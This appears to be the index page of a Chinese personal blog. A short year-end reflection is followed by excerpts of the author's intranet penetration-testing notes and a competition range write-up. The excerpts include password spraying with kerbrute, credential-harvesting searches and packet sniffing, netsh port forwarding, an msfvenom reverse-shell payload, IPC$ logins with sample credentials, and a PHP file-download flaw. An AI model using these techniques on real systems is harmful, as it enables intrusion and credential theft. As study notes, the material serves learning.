关关难过关关过,轻舟终过万重山
再见202424年所有的东西都告一段落了 我回到了自己从小长大的地方 刚好手机电池寿命不够,去售后换了个电池,然后走了很多小时候走过的路 每一次走 总会有一些不同的心境
今年我就22了 以前总觉得22是个大人了 现在自己到了这个年龄还是觉得自己不够成熟 有时候我好迷茫 好彷徨 我好像从出生开始 每一步都走的那么艰难 我依旧记得t4哥说的“学技术能够改命”技术我一直在“努力”的学,可是现在的我好像依旧不支持改命。但对比三年前,已经是有了很大的改变。
望着火 与母亲聊着近况。越聊我越焦虑,越彷徨。有时候我在想,是不是我不留级现在就已经工作能挣钱了,母亲就可以休息了。但转念一想也不可能,问题不是我早工作几年就能解决的。对未来,我既期待又恐惧。
废了 一时间不知道从哪里说起了 从我恋爱以来 已经没正经写过一些自己的想法了 突然感觉 自己已经不善于用自己的话来表达了。
那就不说了 本想今天写点东西的 但不知道从何说起 那就都在火里了 不管以后多么难 走一步看一步吧
关关难过关关过
内网安全-横向移动
弱口令1.超级弱口令检查工具https://github.com/shack2/SNETCracker
2.CrackMapExechttps://github.com/byt3bl33d3r/CrackMapExec
3.NetExechttps://github.com/Pennyw0rth/NetExec
4.PsMapExechttps://github.com/The-Viper-One/PsMapExec
账号密码爆破https://github.com/ropnop/kerbrute/releases
#爆账号kerbrute_windows_amd64.exe userenum -d org.gm7 username.txt#密码喷洒kerbrute_windows_amd64.exe passwordspray -d org.gm7 username.txt 单个密码
AS-REP Roasting在用户开启Dot not require Kerberos preauthentication(不要求 Kerberos 预身份验证)时,此时向域控制器的88端口发送AS ...
内网安全-基础命令
判断是否出网#TCP/HTTP出网: powershell curl http://baidu.com#DNS出网: nslookup baidu.com#ICMP出网: ping baidu.com、tracert baidu.com
判断域环境查看网卡 如果存在主dns后缀则很有可能存在域
ipconfig /all
系统信息内会包含域 没域会显示WORDGROUP
systeminfo | findstr "域:"systeminfo | findstr "Domain:"
查看网络配置 没域会显示WORDGROUP
net config workstation
通过时间查看
net time /domain
查看域控机器名称
nltest /dclist:de1ay
可以看到启动进程的用户 可能有域用户
tasklist /v
查看主机详情查看软件、版本
wmic product get name,version
看进程
tasklist /svc
查看域用户
net user /domain
查看防火墙配置
n ...
内网安全-凭证收集
密码搜集cs里的插件能自动搜集很多软件的密码 这里记录一些命令
检索文件绝对路径
dir /s /b c:|findstr "index.php"
查询文件内的配置信息
findstr /c:"user=" /c:"pass=" /c:"uid=" /c:"pwd=" /si *.ini *.conf *.jsp *.php web.config
linux下搜索
find ./ -name *.phpfind ./ -name *.php | xargs egrep -i "user|pass"
假设拿到shell 不知道数据库的加密方式 解不开hash 可以尝试抓跟网站交互的数据包
tcpdump -i eth0 -s 0 -nnA 'tcp dst port 80 and host 192.168.1.108' | egrep -i 'login=|password=' --color=auto --line-bu ...
内网安全-内网协议
1.NTLMNTLM是一种认证协议,存在NTLM v1和HTLM v2两个版本Windows登陆认证时的流程如下:用户输入密码 -> winlogon.exe -> 接收用户输入的密码 -> 保存为密文 -> lsass.exe -> 登陆成功所以通过创建lsass.exe的转储文件可以拿到机器登陆过的用户hash
Windows 2008以下可以使用非管理员用户进行hash传递Windows 2008以上不可以使用非管理员用户进行hash传递
2.KerberosKerberos是一种认证协议和NTLM是不同的,他的认证在域控端(KDC)上认证
● KDC为密钥分发中心,主要用于Kerberos请求,部分是AS负责认证,部分是TGS负责票据授予● AS为身份验证服务,主要用于接收客户端验证身份的请求● TGS为票据授予服务,当接收到客户端身份验证请求并且认证成功之后会向客户端发放相应的服务票据● kerberos默认88端口
在内网内网端口时一定要留意88端口,如果开放了88端口那么80%的几率是域控或者是LDAP服务
使用ip连接是ntml协议
n ...
内网安全-存活探测
1.windows下pingfor /L %I in (1,1,255) do @ping -w 1 -n 1 10.0.0.%I | find /i "ttl="
2.Linux下pingfor i in 192.168.1.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i is alived; fi; done
3.Nbtscanhttps://github.com/charlesroelli/nbtscan
http://www.unixwiz.net/tools/nbtscan.html#download
基于netbios协议探测主机
Nbtscan.exe 10.10.10.1/24
4.ptscanhttps://github.com/phantom0301/PTscan
pyinstaller -F -w ptscan.pypython PTscan.py -h 10.10.10 -p 80,8080,8888 -m 50 -t 10 -n ...
内网安全-代理隧道
代理隧道1.netsh端口转发
netsh interface portproxy add v4tov4 listenport=本地bind端口 connectaddress=目标服务器(IP) connectport=目标的端口
netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.10.10.10 connectport=80
查看规则
netsh interface portproxy show all
删除规则
netsh interface portproxy delete v4tov4 listenport=7777
删除所有规则
netsh interface portproxy reset
msf反弹shell
填写能够直接跟我们交互的域内机器ipmsfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.80 lport=4455 -f exe > r.exe端口转发netsh i ...
phpstudy模块安装问题
background安装nextcloud网盘 需要php8.2以上的环境 还需要各种扩展
在phpstudy里面勾选了扩展没有生效
参考
https://blog.csdn.net/the3z/article/details/137798911
就是在C:\php\ext下去读扩展了 直接把文件拷到c盘下就行了
当然最好的方法是改配置文件 php.ini里增加扩展路径即可
extension_dir ="C:\soft\phpstudy_pro\Extensions\php\php8.2.9nts\ext"
2024网安湘军杯
background报着玩的比赛 没想到结果还行 还是比较白的
靶场是提交漏洞的 按点位算的 实网攻防就是hw 这里记录下靶场的漏洞 蛮基础的东西 比赛也不禁网 想到啥问题直接搜就行了
目录遍历扫出来就是这个 东西都能看 但是没啥用
任意文件下载重点看mdownload.php.bak 很明显的任意文件读取
<?phpfunction MuDownloadFile($baseDir, $fileName) { // 组合文件路径 $filePath = realpath($baseDir . '/' . $fileName); // 检查文件是否在指定目录下,防止目录遍历 /*if (strpos($filePath, realpath($baseDir)) !== 0) { die("非法文件路径!"); }*/ // 检查文件是否存在 if (!file_exists($filePath)) { die(" ...
内网安全攻防
内网远程连接本来打算写在一起 后面发现太乱了 所以还是分开写了
参考:
https://blog.gm7.org/
https://xz.aliyun.com/t/13697
https://blog.csdn.net/weixin_45910629/article/details/137595994
ipc条件:
开了139 445端口
开启了默认共享
#可以图形化界面输入\\10.10.10.10然后输入账号密码打开,也可以使用命令net use \\192.168.30.151\ipc$ /u:de1ay\administrator !QAZ2wsxnet use \\192.168.30.151\ipc$ /u:administrator !QAZ2wsx
dir查看路径
dir \\192.168.30.151\c$\360safe
tasklist 有点慢 要等一段时间
tasklist /S 192.168.30.151 /U de1ay\administrator /P !QAZ2wsx
计划任务上线at在Windows08之前的版本上
#建立连接后查看时间 ...